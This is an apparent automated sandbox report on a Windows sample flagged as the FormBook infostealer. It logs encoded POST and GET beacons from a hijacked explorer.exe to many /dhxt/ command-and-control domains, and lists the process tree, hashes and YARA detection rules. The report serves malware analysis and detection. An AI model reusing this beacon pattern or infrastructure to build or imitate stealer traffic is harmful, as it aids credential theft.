                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NeWCa93mAUJpJ7d3uXcI45gX%2FeiIB3HEfHTgDrNM9dRIP219L1MlPaXBY0gtt2LOd7VXVgjxMjZE51%2FbVtHleRMfzDt8DlBQrMc0fX6VmtONiKNKvWtc91LpL4I2r1U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 795449703be33734-FRA
                                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                              20 | 192.168.2.4 | 49715 | 3.127.73.216 | 80 | C:\Windows\explorer.exe
                                                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                                                              Feb 6, 2023 14:39:48.846231937 CET | 282 | OUT | GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=FfOdtLZjvYP8bXm/clPh5g/7x4+RQqyIHbKOkwKrIc0A7AIax+WKqABy5xS4eERJuSBeHh7W6Lqe0kjzR+0vnl8saQ3UdmHxRw== HTTP/1.1
                                                                                                              Host: www.ontheverge.wales
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:39:48.868232012 CET | 282 | IN | HTTP/1.1 403 Forbidden
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 06 Feb 2023 13:39:48 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 125
                                                                                                              Connection: close
                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                              21 | 192.168.2.4 | 49716 | 164.88.122.250 | 80 | C:\Windows\explorer.exe
                                                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                                                              Feb 6, 2023 14:39:54.498359919 CET | 284 | OUT | POST /dhxt/ HTTP/1.1
                                                                                                              Host: www.0w3jy.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.0w3jy.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.0w3jy.com/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Ascii: UlkAHnsI=IWK2TcBkuBYfBAEyPXlkT7VVWXx7bzlkalKmGoBIvmWZXLMaj4HPg1n9jcdg9blypucViwWoeU0p7Z8vNDZ9vETjkwlyErhFMDqSWf1DVJotzcesDYgcfob7kOwiz0iSYkIytVVKSf005hn_CQIjqOCbicOfJxQyMNGMR-ZRnaSrzDU17A).
                                                                                                              Feb 6, 2023 14:39:54.828010082 CET | 285 | IN | HTTP/1.1 404
                                                                                                              Set-Cookie: JSESSIONID=A2C4AD7E85D2752EF8497A9F15289DC6; Path=/; HttpOnly
                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                              Content-Length: 3627
                                                                                                              Date: Mon, 06 Feb 2023 13:39:52 GMT
                                                                                                              Connection: close
                                                                                                              Data Ascii: <!DOCTYPE html><html><head><title>404 - </title><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta name="author" content=""/><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=8,IE=9,IE=10" /><meta http-equiv="Expires" content="0"><meta http-equiv="Cache-Control" content="no-cache"><meta http-equiv="Cache-Control" content="no-store"><script src="//static.st1.cn/static_vip_feng/jquery/jquery-1.8.3.min.js" type="text/javascript"></script><link href="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/css_cerulean/bootstrap.min.css" type="text/css" rel="stylesheet" /><script src="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/js/bootstrap.min.js" type="text/javascript"></script><link href="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/awesome/css/font-awesome.min.css" type="text/css" rel="stylesheet" />...[if lte IE 7]><link href="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/awesome/font-a
                                                                                                              Feb 6, 2023 14:39:54.828052044 CET | 286 | IN | Data Raw: 77 65 73 6f 6d 65 2d 69 65 37 2e 6d 69 6e 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49
                                                                                                              Data Ascii: wesome-ie7.min.css" type="text/css" rel="stylesheet" /><![endif]-->...[if lte IE 6]><link href="//static.st1.cn/static_vip_feng/bootstrap/bsie/css/bootstrap-ie6.min.css" type="text/css" rel="stylesheet" /><script src="//static.st1.cn/stat
                                                                                                              Feb 6, 2023 14:39:54.828073978 CET | 288 | IN | Data Raw: 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 73 74 31 2e 63 6e 2f 73 74 61 74 69 63 5f 76 69 70 5f 66 65 6e 67 2f 63 6f 6d 6d 6f 6e 2f 6d 75 73 74 61 63 68 65 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63
                                                                                                              Data Ascii: ipt src="//static.st1.cn/static_vip_feng/common/mustache.min.js" type="text/javascript"></script><link href="//static.st1.cn/static_vip_feng/common/bcsite.min.css" type="text/css" rel="stylesheet" /><script src="//static.st1.cn/static_vip_


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                              22 | 192.168.2.4 | 49717 | 164.88.122.250 | 80 | C:\Windows\explorer.exe
                                                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                                                              Feb 6, 2023 14:39:57.346777916 CET | 288 | OUT | GET /dhxt/?UlkAHnsI=FUiWQqlvvhcOKQQuFFk1YdMODVpPUkI9QkHdYK1vvGDvQckHnduU+ib0kpFdu5Ayi+Be8xCaUG88sYAzbmt0txmA9iBLGYJGLw==&2ani-=qhGAdkIKoH HTTP/1.1
                                                                                                              Host: www.0w3jy.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:39:57.682760954 CET | 290 | IN | HTTP/1.1 404
                                                                                                              Set-Cookie: JSESSIONID=72EFB16ABEFDD907EC10005AFC0C81CB; Path=/; HttpOnly
                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                              Content-Length: 3627
                                                                                                              Date: Mon, 06 Feb 2023 13:39:54 GMT
                                                                                                              Connection: close
                                                                                                              Data Ascii: <!DOCTYPE html><html><head><title>404 - </title><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta name="author" content=""/><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=8,IE=9,IE=10" /><meta http-equiv="Expires" content="0"><meta http-equiv="Cache-Control" content="no-cache"><meta http-equiv="Cache-Control" content="no-store"><script src="//static.st1.cn/static_vip_feng/jquery/jquery-1.8.3.min.js" type="text/javascript"></script><link href="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/css_cerulean/bootstrap.min.css" type="text/css" rel="stylesheet" /><script src="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/js/bootstrap.min.js" type="text/javascript"></script><link href="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/awesome/css/font-awesome.min.css" type="text/css" rel="stylesheet" />...[if lte IE 7]><link href="//static.st1.cn/static_vip_feng/bootstrap/2.3.1/awesome/font-a
Feb 6, 2023 14:39:57.682811022 CET | 291 | IN
                                                                                                              Data Ascii: wesome-ie7.min.css" type="text/css" rel="stylesheet" /><![endif]-->...[if lte IE 6]><link href="//static.st1.cn/static_vip_feng/bootstrap/bsie/css/bootstrap-ie6.min.css" type="text/css" rel="stylesheet" /><script src="//static.st1.cn/stat
Feb 6, 2023 14:39:57.682852030 CET | 292 | IN
                                                                                                              Data Ascii: ipt src="//static.st1.cn/static_vip_feng/common/mustache.min.js" type="text/javascript"></script><link href="//static.st1.cn/static_vip_feng/common/bcsite.min.css" type="text/css" rel="stylesheet" /><script src="//static.st1.cn/static_vip_


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.4 | 49718 | 81.169.145.72 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:40:02.849679947 CET | 293 | OUT | POST /dhxt/ HTTP/1.1
                                                                                                              Host: www.frogair.online
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.frogair.online
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.frogair.online/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Ascii: UlkAHnsI=j8bEuTXUTX(DBeivzaDj1krM2iP6WxfmxSP1ip2V(glFH9upfE0KL0ZoywTBAor71ZzBEZabHKvPPht0FuDnKDymR2BPJTc5ZuA7MYr3Q6ItJrjfN1Lbhyj2gNJIiABLFix1sqvAnaTdmPxTtzzhOFqfSUwVN07-Nlpp3nGdVwhUYhOKEQ).
Feb 6, 2023 14:40:02.872836113 CET | 294 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:40:02 GMT
                                                                                                              Server: Apache/2.4.55 (Unix)
                                                                                                              Content-Length: 196
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.2.4 | 49719 | 81.169.145.72 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:40:05.410651922 CET | 294 | OUT | GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=u+zktjrvfgHZI+Oz0oPk7S6z3SS4eQzlxj31ise38TMlPN2sQxJreAld73CkW67638HFSoqfGq7wTiBJHuDRXWnGAUEuFgsZZw== HTTP/1.1
                                                                                                              Host: www.frogair.online
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
Feb 6, 2023 14:40:05.433163881 CET | 295 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:40:05 GMT
                                                                                                              Server: Apache/2.4.55 (Unix)
                                                                                                              Content-Length: 196
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49698 | 87.236.16.107 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:38:39.050745964 CET | 132 | OUT | POST /dhxt/ HTTP/1.1
                                                                                                              Host: www.fildoor.store
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.fildoor.store
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.fildoor.store/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Ascii: UlkAHnsI=xtAlBr0pPq19XJ1b~Bc02Q7A1EKd5oab~cky7edvbopvwwbcZP5IQcd5khqRyW2paxwEJ-MaDxRoktKHvA59U8UVG8U_5hZxiwHAnT1hSjiBPQODtLmul42_7OLQIIIx1Y7Q8VrvAVsrkAtizFkP2uuo8N~YUqlKwQOyriWWU-bb6zayog).
Feb 6, 2023 14:38:39.139154911 CET | 133 | IN | HTTP/1.1 404 Not Found
                                                                                                              Server: nginx-reuseport/1.21.1
                                                                                                              Date: Mon, 06 Feb 2023 13:38:39 GMT
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49699 | 87.236.16.107 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:38:41.635281086 CET | 133 | OUT | GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=8voFCfVULodAC65O8zxk+Vq77CzX57WY/dJ15bldeZcww2bgGpUJFoE2xkKZjlmzbDc1YNM8KHZO1I2ZrlZ1XIcvUu8N2Hwmug== HTTP/1.1
                                                                                                              Host: www.fildoor.store
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
Feb 6, 2023 14:38:41.724910975 CET | 134 | IN | HTTP/1.1 404 Not Found
                                                                                                              Server: nginx-reuseport/1.21.1
                                                                                                              Date: Mon, 06 Feb 2023 13:38:41 GMT
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Content-Length: 277
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.fildoor.store Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49700 | 185.215.4.36 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:38:46.801196098 CET | 135 | OUT | POST /dhxt/ HTTP/1.1
                                                                                                              Host: www.parkhomenko-zinaida.ru
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.parkhomenko-zinaida.ru
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.parkhomenko-zinaida.ru/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Ascii: UlkAHnsI=Liu5(hGT5cXTo0ce1M2iD9YnAYqRt5VtLRrbJ5GzKlmraNdp9wqLqE(DV09iwrs_B-tUHYGPRywGem5Hrwpo8L4Bdwx6qVTwEfGyCatduSpmmBkuTHFqIduWZ4iK6zRKwMZkLcDxm1Qhx0s-jH5VQ6~9ZI1lHCvVLdIMQXX1SUAWfYvNyw).
Feb 6, 2023 14:38:46.911653996 CET | 136 | IN | HTTP/1.1 404 Not Found
                                                                                                              Server: ddos-guard
                                                                                                              Connection: close
                                                                                                              Set-Cookie: __ddg1_=sjr8VH2kl98dTS0k7bsN; Domain=.parkhomenko-zinaida.ru; HttpOnly; Path=/; Expires=Tue, 06-Feb-2024 13:38:46 GMT
                                                                                                              Date: Mon, 06 Feb 2023 13:38:46 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Content-Length: 340
                                                                                                              Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                              ETag: "154-56d5bbe607fc0"
                                                                                                              Accept-Ranges: bytes
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.4 | 49701 | 185.215.4.36 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:38:49.344099998 CET | 137 | OUT | GET /dhxt/?UlkAHnsI=GgGZ8XnpwcXWt0AEsp/4OdJSGPmAlrgxEwmnAr+KMWurQo94+Qn94Sj3VSd8nLdkKuBNUoOidT9aHFNGgyN51vgfDTNlsm7YLA==&2ani-=qhGAdkIKoH HTTP/1.1
                                                                                                              Host: www.parkhomenko-zinaida.ru
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
Feb 6, 2023 14:38:49.411067009 CET | 138 | IN | HTTP/1.1 404 Not Found
                                                                                                              Server: ddos-guard
                                                                                                              Connection: close
                                                                                                              Set-Cookie: __ddg1_=XE0fV0UMErmDXLjU52G3; Domain=.parkhomenko-zinaida.ru; HttpOnly; Path=/; Expires=Tue, 06-Feb-2024 13:38:49 GMT
                                                                                                              Date: Mon, 06 Feb 2023 13:38:49 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Content-Length: 340
                                                                                                              Upgrade: h2,h2c
                                                                                                              Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                              ETag: "154-56d5bbe607fc0"
                                                                                                              Accept-Ranges: bytes
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.4 | 49702 | 199.192.28.121 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:38:56.982057095 CET | 139 | OUT | POST /dhxt/ HTTP/1.1
                                                                                                              Host: www.dezella.xyz
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.dezella.xyz
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.dezella.xyz/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Ascii: UlkAHnsI=9ZnHcHAFYmMpUXb1xIbNiAuMGjP6FTD1QB3BzS9RUjqXGMkGqMw3DRDeOyGeYvkSo2nGyZviVdsAqYiH0GHgLVu1IClnX39Vqoyc7j0Gq38VzBtMVal1Y0A8x3nb4cpUkuc-VpnTSPWxUQr_ZD9yRTMmhT9hZIMdd-7wsVDUpq0P8mPiMg).
Feb 6, 2023 14:38:57.244018078 CET | 140 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:38:57 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 16026
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.4 | 49703 | 199.192.28.121 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:38:59.710459948 CET | 156 | OUT | GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=wbPnfyQfXR4PZAPT09H9uXzHHhq4HhWkGwCNvg5IVQDwAqkAqM9rZA7nMC+fOtAInmSNsI36IN462a2w51jaKCiXRWhZTFR9pQ== HTTP/1.1
                                                                                                              Host: www.dezella.xyz
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
Feb 6, 2023 14:38:59.995573044 CET | 158 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:38:59 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 16026
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.4 | 49704 | 132.148.233.235 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:39:05.377790928 CET | 175 | OUT | POST /dhxt/ HTTP/1.1
                                                                                                              Host: www.staciesellslka.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.staciesellslka.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.staciesellslka.com/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Ascii: UlkAHnsI=vdAEyjUQG9diaqMj3zAbgkA7K2pUiXAJgolLa6(EyLtpOUC65ZNqefY-a-JNfEUUPNxYAKYOYGmiBIVCS5sfuE4XWmrLbHJeBJtRVO8Rk-2fezI13QnqzEhd1GQcsCtGu7x6NwXIHy~XIrLFUIYT3JbURFynvFAntCIlhrY2S6bxb8dZKQ).
                                                                                                              Feb 6, 2023 14:39:05.677381039 CET 176 IN HTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:39:05 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.4.33
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://www.staciesellslka.com/wp-json/>; rel="https://api.w.org/"
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Vary: Accept-Encoding,User-Agent
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 11491
                                                                                                              Content-Type: text/html; charset=UTF-8



                                                                                                              Target ID:0
                                                                                                              Start time:14:36:02
                                                                                                              Start date:06/02/2023
                                                                                                              Path:C:\Users\user\Desktop\zeuhAxTIRX.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\Desktop\zeuhAxTIRX.exe
                                                                                                              Imagebase:0xe50000
                                                                                                              File size:186368 bytes
                                                                                                              MD5 hash:271AE718B77B74826BB47FA7495EB565
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              Reputation:low

                                                                                                              Target ID:3
                                                                                                              Start time:14:37:45
                                                                                                              Start date:06/02/2023
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                              Imagebase:0x7ff618f60000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Target ID:7
                                                                                                              Start time:14:38:03
                                                                                                              Start date:06/02/2023
                                                                                                              Path:C:\Windows\SysWOW64\autoconv.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                                                              Imagebase:0x8b0000
                                                                                                              File size:851968 bytes
                                                                                                              MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              Target ID:8
                                                                                                              Start time:14:38:04
                                                                                                              Start date:06/02/2023
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Imagebase:0x140000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              Reputation:high


                                                                                                                Execution Graph

                                                                                                                Execution Coverage:8.2%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:1.6%
                                                                                                                Total number of Nodes:1021
                                                                                                                Total number of Limit Nodes:103
